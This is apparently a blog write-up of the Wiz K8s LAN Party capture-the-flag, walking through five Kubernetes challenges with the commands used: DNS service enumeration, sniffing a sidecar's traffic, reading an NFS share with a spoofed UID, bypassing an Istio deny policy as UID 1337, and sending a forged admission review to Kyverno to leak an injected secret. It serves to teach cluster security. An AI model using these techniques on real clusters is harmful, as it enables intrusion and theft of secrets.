Table of Contents


I recently had the chance to try the K8s LAN Party by Wiz, which is the latest version of their mini-CTFs before conferences. The last one was the EKS Cluster Games which was good fun, so I was excited to try this as well. Unfortunately, it came out whilst I was on holiday so didn’t have a chance to do it straight away but promptly did it on my return.

Unlike previous challenges which were typically done in a series, this one had 5 distinct challenges which could be attempted in any order. Each challenge followed a different theme.

Challenge 1 - Recon

The first challenge had the following description:

DNSing with the stars

You have compromised a Kubernetes pod, and your next objective is to compromise other internal services further.

As a warmup, utilize DNS scanning to uncover hidden internal services and obtain the flag. We have preloaded your machine with dnscan to ease this process for further challenges.

All the flags in the challenge follow the same format: wiz_k8s_lan_party{*}

Clearly a nice entry challenge to get us started, and gives us the flag format for the rest of the challenges. Looks like it has something to do with DNS. My immediate thought when it comes to this is wildcard DNS, which used to be a common occurrence in clusters allowing resolution of items such as any.any.svc.cluster.local to get a list of all services.

Like last time, we have an interactive shell in the browser. So we can try that with host any.any.svc.cluster.local and see what we get.

player@wiz-k8s-lan-party:~$ host any.any.svc.cluster.local
Host any.any.svc.cluster.local not found: 3(NXDOMAIN)

Nope, clearly no wildcard DNS. The description also mentioned a tool called dnscan which I’m not familiar with. A quick look at its help suggests it takes a subnet as input. This suggests it could be enumerating PTR records for each IP in that subnet. We just need a subnet to scan. The immediate thought would be the service CIDR range, or the pod CIDR range. Let’s start with service.

We now need to guess at what the service CIDR range is, luckily we can get the service IP of the API server through environment variables. I usually just assume that’s a /16, so let’s see how that goes.

player@wiz-k8s-lan-party:~$ env | grep -i kube
player@wiz-k8s-lan-party:~$ dnscan -subnet
34952 / 65536 [----------------------------------------------->__________________________________________] 53.33% 977 p/s getflag-service.k8s-lan-party.svc.cluster.local.
65470 / 65536 [----------------------------------------------------------------------------------------->] 99.90% 978 p/s -> getflag-service.k8s-lan-party.svc.cluster.local.

Nice, we found a service called getflag-service. Let’s see if we can get the flag from it.

player@wiz-k8s-lan-party:~$ curl getflag-service.k8s-lan-party.svc.cluster.local.

Challenge 2 - Finding Neighbours

The next challenge had the following description:


Sometimes, it seems we are the only ones around, but we should always be on guard against invisible sidecars reporting sensitive secrets.

This seems to imply there is a sidecar container in the pod we are currently in. Sidecars are just extra containers in the same pod, and can share various namespaces as another container. The network namespace for example is shared between containers in a pod, and other namespaces such as PID can be shared if configured in the pod specification.

The reporting sensitive secrets suggests the sidecar is making requests to an external service. So we can try to capture network traffic and see what we see.

player@wiz-k8s-lan-party:~$ tcpdump -i any -A -s0 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes
.d...b..POST / HTTP/1.1
Host: reporting-service
User-Agent: curl/7.64.0
Accept: */*
Content-Length: 63
Content-Type: application/x-www-form-urlencoded

36 packets captured
36 packets received by filter
0 packets dropped by kernel

Quickly skimming the output, we find the flag in a POST request being sent to the reporting-service.

Challenge 3 - Data Leakage

Making good progress, let’s move to the next one:

Exposed File Share

The targeted big corp utilizes outdated, yet cloud-supported technology for data storage in production. But oh my, this technology was introduced in an era when access control was only network-based 🤦.

Interesting, I can’t guess exactly what this is referring to purely from that. Let’s dig in a bit to the pod and see what’s going on.

player@wiz-k8s-lan-party:~$ mount
[..SNIP..] on /efs type nfs4 (ro,relatime,vers=4.1,rsize=1048576,wsize=1048576,namlen=255,hard,noresvport,proto=tcp,timeo=600,retrans=2,sec=sys,clientaddr=,local_lock=none,addr=

Of particular note, within the mount output we see an NFS mount. This is a network file system, that has historically been susceptible to a variety of attacks. For example, access controls are typically determined by the client which can lead to fun attacks. In this case, we see that this is mounted to /efs. Let’s have a look within.

player@wiz-k8s-lan-party:~$ ls -lpa /efs/
total 8
drwxr-xr-x 2 root   root   6144 Mar 11 11:43 ./
drwxr-xr-x 1 player player   51 Mar 15 07:24 ../
---------- 1 daemon daemon   73 Mar 11 13:52 flag.txt
player@wiz-k8s-lan-party:~$ id daemon
uid=1(daemon) gid=1(daemon) groups=1(daemon)

OK, there is the flag, but we need to be daemon to read it which is UID 1. We now need a way to access the NFS share with UID 1. Unfortunately, we aren’t root within the container, so we can’t simply jump to a different UID trivially. Luckily, there are tools for userspace NFS access, for example nfsshell which I have used in the past. I know from previous challenges, it’s common for Wiz to put the relevant tooling required in the container to help out. So let’s see what may already be here. We can have a guess at a few by using bash autocomplete to guess at some tool names:

player@wiz-k8s-lan-party:~$ nfs 
nfs-cat    nfs-cp     nfs-ls     nfsconf    nfsidmap   nfsiostat  nfsstat    

nfs-ls, nfs-cp and nfs-cat seems like they could be useful, let’s quickly Google it to see what it’s about. A quick Google takes us to a repository which looks to be the source, and contains some documentation on the library.

The tools looks to use NFS URIs of the form nfs://[<username>@]<server|ipv4|ipv6>[:<port>]/path[?arg=val[&arg=val]*]. This seems simple enough.

player@wiz-k8s-lan-party:~$ nfs-ls nfs://          
Failed to mount nfs share : mount_cb: nfs_service failed

Maybe not, that doesn’t look right. Skimming the documentation a but further, a thing that pops out is it defaults to NFS 3, however looking at mount we need NFS 4. We can generate what we think the URI should be with the details from the mount command.

player@wiz-k8s-lan-party:~$ nfs-ls nfs://
----------  1     1     1           73 flag.txt

Excellent, so this tool seems to be working nicely. Let’s cat the file and move on.

player@wiz-k8s-lan-party:~$ nfs-cat nfs://
Failed to mount nfs share : nfs_mount_async failed. Bad export path. Absolute path does not start with '/'
Failed to open nfs://

Interesting, back to the documentation. In some of the examples under LD_PRELOAD, I notice they have two slashes at the start of the path. Maybe this tool requires that.

player@wiz-k8s-lan-party:~$ nfs-cat nfs://
Failed to open file /flag.txt: open call failed with "NFS4: (path /) failed with NFS4ERR_ACCESS(-13)"
Failed to open nfs://

Awesome, moving forwards. That is the error message expected considering the file permissions. We want to aim for UID 1. Looking at the documentation, we can set UID as an extra parameter in the URI.

player@wiz-k8s-lan-party:~$ nfs-cat nfs://\&uid=1
Failed to open file /flag.txt: open call failed with "NFS4: (path /) failed with NFS4ERR_ACCESS(-13)"
Failed to open nfs://

Interesting, same error. That’s unexpected.

At this point, I spent a lot of time trying to debug this, going down various rabbit holes such as NFS delegation, etc before moving on for now. I later come back after solving challenges 4 and 5. I carry on trying various things hoping to figure out what is going on. In one moment, in frustration I randomly decide to change UID to daemon even though the documentation states it takes an integer. Which randomly worked, and I have no idea why. If you know why, let me know.

player@wiz-k8s-lan-party:~$ nfs-cat nfs://\&uid=daemon

Testing it, it looked to have worked no matter what string was put as the UID or when the UID is 0. 0 makes sense… the default was the current UID according to the documentation, and I had forgot I wasn’t root. The letters, less so.

Challenge 4 - Bypassing Boundaries

Looking at challenge 4, it has the description:

The Beauty and The Ist

Apparently, new service mesh technologies hold unique appeal for ultra-elite users (root users). Don't abuse this power; use it responsibly and with caution.

This one also has a policy:

kind: AuthorizationPolicy
  name: istio-get-flag
  namespace: k8s-lan-party
  action: DENY
      app: "{flag-pod-name}"
  - from:
    - source:
        namespaces: ["k8s-lan-party"]
    - operation:
        methods: ["POST", "GET"]

This suggests there is an endpoint that we can request the flag from. However, the HTTP verbs to perform that request are blocked by an Istio policy. We probably need to bypass this policy to get the flag.

First things first, we need an endpoint. Whilst we know the policy, we don’t know the name of the service. However, we can use the same DNS enumeration technique as before to find the service.

root@wiz-k8s-lan-party:~# dnscan -subnet
[..SNIP..] -> istio-protected-pod-service.k8s-lan-party.svc.cluster.local.
root@wiz-k8s-lan-party:~# curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local  
RBAC: access denied

Name’s a bit on the nose, but we now have a target. Thinking on how to bypass the policy a few thoughts cross my mind. There could be a bypass for the Istio policy of the likes of modifying the HTTP request in a way to bypass the Istio policy. However, this is unlikely as if manners of that existed, they would likely get disclosed as part of responsible disclosure and patched as opposed to being seen in a CTF. Much more likely there is a something within Istio itself that we can setup or spoof to bypass the policy.

However, I do try a few of those techniques just in case. You never know. As expected, they didn’t work.

Googling around for known Istio bypasses, I get drawn to UID 1337. This is the UID used by the Istio proxy, and has an exception in iptables rules. For example, -A ISTIO_OUTPUT -m owner --uid-owner 1337 -j RETURN. This could mean that we can simply change our UID to 1337, and the request just works.

Looking at /etc/passwd in the container, we do see istio within there. So let’s su to that user, and try the curl again.

root@wiz-k8s-lan-party:~# cat /etc/passwd | grep 1337
root@wiz-k8s-lan-party:~# su istio
$ curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local; echo

Excellent, that is one I need to keep in mind for the future.

Challenge 5 - Lateral Movement

The final challenge states:

Who will guard the guardians?

Where pods are being mutated by a foreign regime, one could abuse its bureaucracy and leak sensitive information from the administrative services.

It also has its own policy:

kind: Policy
  name: apply-flag-to-env
  namespace: sensitive-ns
    - name: inject-env-vars
            - Pod
              - name: "*"
                  - name: FLAG
                    value: "{flag}"

This suggests there is a Kyverno policy to inject the flag into pods created within the sensitive-ns namespace. A quick check of our permissions in that namespace, suggest it’s the default:

player@wiz-k8s-lan-party:~$ kubectl -n sensitive-ns auth can-i --list
2024/03/18 18:42:39 Starlark failed to allocate 4GB address space: cannot allocate memory. Integer performance may suffer.
Warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources                                       Non-Resource URLs                     Resource Names     Verbs   []                                    []                 [create]    []                                    []                 [create]
                                                [/.well-known/openid-configuration]   []                 [get]
                                                [/api/*]                              []                 [get]
                                                [/api]                                []                 [get]
                                                [/apis/*]                             []                 [get]
                                                [/apis]                               []                 [get]
                                                [/healthz]                            []                 [get]
                                                [/healthz]                            []                 [get]
                                                [/livez]                              []                 [get]
                                                [/livez]                              []                 [get]
                                                [/openapi/*]                          []                 [get]
                                                [/openapi]                            []                 [get]
                                                [/openid/v1/jwks]                     []                 [get]
                                                [/readyz]                             []                 [get]
                                                [/readyz]                             []                 [get]
                                                [/version/]                           []                 [get]
                                                [/version/]                           []                 [get]
                                                [/version]                            []                 [get]
                                                [/version]                            []                 [get]
podsecuritypolicies.policy                      []                                    [eks.privileged]   [use]

Thus it’s unlikely the API server is the route to go, especially considering the nature of the other challenges. I then remember some thoughts I had on a client engagement a while back with regards to admission webhooks, of possible techniques to attempt to access/exfiltrate data through admission reviews. Which seems like it would work here. If we submit our own admission review to Kyverno for the creation of a “new” pod, its response would include a patch to inject the flag.

We now need the endpoint for Kyverno. Luckily, Kyverno keeps to relatively sane defaults where it’s most likely going to be kyverno-svc in the kyverno namespace.

player@wiz-k8s-lan-party:~$ host kyverno-svc.kyverno.svc.cluster.local
kyverno-svc.kyverno.svc.cluster.local has address

Excellent. Next we need is the path. I couldn’t remember the path off the top of my head, so I spun up a quick test cluster with Kyverno and applied the same policy to make sure a mutating policy was in place. I could then query the API server for mutatingwebhookconfigurations and just pull the path from the clientConfig

$ kubectl get mutatingwebhookconfigurations kyverno-resource-mutating-webhook-cfg -o yaml
kind: MutatingWebhookConfiguration
  name: kyverno-resource-mutating-webhook-cfg
      name: kyverno-svc
      namespace: kyverno
      path: /mutate/fail
      port: 443

Excellent, we now have the endpoint and path. We now need to generate an admission review request. This is a standard format for webhook admission controllers. I did try manually creating my own, but got frustrated and just Googled for a solution and found someone made a tool for it. I should have checked first xD

So this will create the JSON payload for a pod specification, let’s create a dummy pod specification, and then create an admission review for it.

$ cat pod.yml
apiVersion: v1
kind: Pod
  name: testing
  namespace: sensitive-ns
    - name: test
      image: foo
        - name: FLAG
          value: foo
$ kube-review create pod.yml
    "kind": "AdmissionReview",
    "apiVersion": "",
    "request": {
        "uid": "64f8eebc-dbc2-4e4d-9264-acf606306ee1",
        "kind": {
            "group": "",
            "version": "v1",
            "kind": "Pod"
        "resource": {
            "group": "",
            "version": "v1",
            "resource": "pods"
        "requestKind": {
            "group": "",
            "version": "v1",
            "kind": "Pod"
        "requestResource": {
            "group": "",
            "version": "v1",
            "resource": "pods"
        "name": "testing",
        "namespace": "sensitive-ns",
        "operation": "CREATE",
        "userInfo": {
            "username": "kube-review",
            "uid": "31808dbc-108a-4722-adc3-75bfc50d8ef3"
        "object": {
            "kind": "Pod",
            "apiVersion": "v1",
            "metadata": {
                "name": "testing",
                "namespace": "sensitive-ns",
                "creationTimestamp": null
            "spec": {
                "containers": [
                        "name": "test",
                        "image": "foo",
                        "env": [
                                "name": "FLAG",
                                "value": "foo"
                        "resources": {}
            "status": {}
        "oldObject": null,
        "dryRun": true,
        "options": {
            "kind": "CreateOptions",
            "apiVersion": ""

Now we have the review, let’s submit it to Kyverno.

player@wiz-k8s-lan-party:~$ curl -k https://kyverno-svc.kyverno.svc.cluster.local/mutate/fail -X POST --data @review -H "Content-Type: application/json" | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  3085  100  1397  100  1688  51134  61786 --:--:-- --:--:-- --:--:--  111k
  "kind": "AdmissionReview",
  "apiVersion": "",
  "request": {
    "uid": "64f8eebc-dbc2-4e4d-9264-acf606306ee1",
    "kind": {
      "group": "",
      "version": "v1",
      "kind": "Pod"
    "resource": {
      "group": "",
      "version": "v1",
      "resource": "pods"
    "requestKind": {
      "group": "",
      "version": "v1",
      "kind": "Pod"
    "requestResource": {
      "group": "",
      "version": "v1",
      "resource": "pods"
    "name": "testing",
    "namespace": "sensitive-ns",
    "operation": "CREATE",
    "userInfo": {
      "username": "kube-review",
      "uid": "31808dbc-108a-4722-adc3-75bfc50d8ef3"
    "object": {
      "kind": "Pod",
      "apiVersion": "v1",
      "metadata": {
        "name": "testing",
        "namespace": "sensitive-ns",
        "creationTimestamp": null
      "spec": {
        "containers": [
            "name": "test",
            "image": "foo",
            "env": [
                "name": "FLAG",
                "value": "foo"
            "resources": {}
      "status": {}
    "oldObject": null,
    "dryRun": true,
    "options": {
      "kind": "CreateOptions",
      "apiVersion": ""
  "response": {
    "uid": "64f8eebc-dbc2-4e4d-9264-acf606306ee1",
    "allowed": true,
    "patch": "W3sib3AiOiJyZXBsYWNlIiwicGF0aCI6Ii9zcGVjL2NvbnRhaW5lcnMvMC9lbnYvMC92YWx1ZSIsInZhbHVlIjoid2l6X2s4c19sYW5fcGFydHl7eW91LWFyZS1rOHMtbmV0LW1hc3Rlci13aXRoLWdyZWF0LXBvd2VyLXRvLW11dGF0ZS15b3VyLXdheS10by12aWN0b3J5fSJ9LCB7InBhdGgiOiIvbWV0YWRhdGEvYW5ub3RhdGlvbnMiLCJvcCI6ImFkZCIsInZhbHVlIjp7InBvbGljaWVzLmt5dmVybm8uaW8vbGFzdC1hcHBsaWVkLXBhdGNoZXMiOiJpbmplY3QtZW52LXZhcnMuYXBwbHktZmxhZy10by1lbnYua3l2ZXJuby5pbzogcmVwbGFjZWQgL3NwZWMvY29udGFpbmVycy8wL2Vudi8wL3ZhbHVlXG4ifX1d",
    "patchType": "JSONPatch"

The patch in the response is the JSON patch that Kyverno has generated for this. Decoding it leads to our final flag.

player@wiz-k8s-lan-party:~$ base64 -d <<< W3sib3AiOiJyZXBsYWNlIiwicGF0aCI6Ii9zcGVjL2NvbnRhaW5lcnMvMC9lbnYvMC92YWx1ZSIsInZhbHVlIjoid2l6X2s4c19sYW5fcGFydHl7eW91LWFyZS1rOHMtbmV0LW1hc3Rlci13aXRoLWdyZWF0LXBvd2VyLXRvLW11dGF0ZS15b3VyLXdheS10by12aWN0b3J5fSJ9LCB7InBhdGgiOiIvbWV0YWRhdGEvYW5ub3RhdGlvbnMiLCJvcCI6ImFkZCIsInZhbHVlIjp7InBvbGljaWVzLmt5dmVybm8uaW8vbGFzdC1hcHBsaWVkLXBhdGNoZXMiOiJpbmplY3QtZW52LXZhcnMuYXBwbHktZmxhZy10by1lbnYua3l2ZXJuby5pbzogcmVwbGFjZWQgL3NwZWMvY29udGFpbmVycy8wL2Vudi8wL3ZhbHVlXG4ifX1d; echo
[{"op":"replace","path":"/spec/containers/0/env/0/value","value":"wiz_k8s_lan_party{you-are-k8s-net-master-with-great-power-to-mutate-your-way-to-victory}"}, {"path":"/metadata/annotations","op":"add","value":{"":" replaced /spec/containers/0/env/0/value\n"}}]


That was a fun set of challenges. I particularly enjoyed the variety of techniques required to solve them. I’m still slightly annoyed at the NFS command in challenge 3 and that randomly working with an invalid UID. These CTFs are starting to be a regular occurrence by Wiz, so I’m pretty sure we can see another one soon which I’m looking forward to. Last year I think their first was an AWS one for fwd:CloudSec which was also good fun. This year, fwd:CloudSec is in June so maybe that’s how long I have to wait for the next one.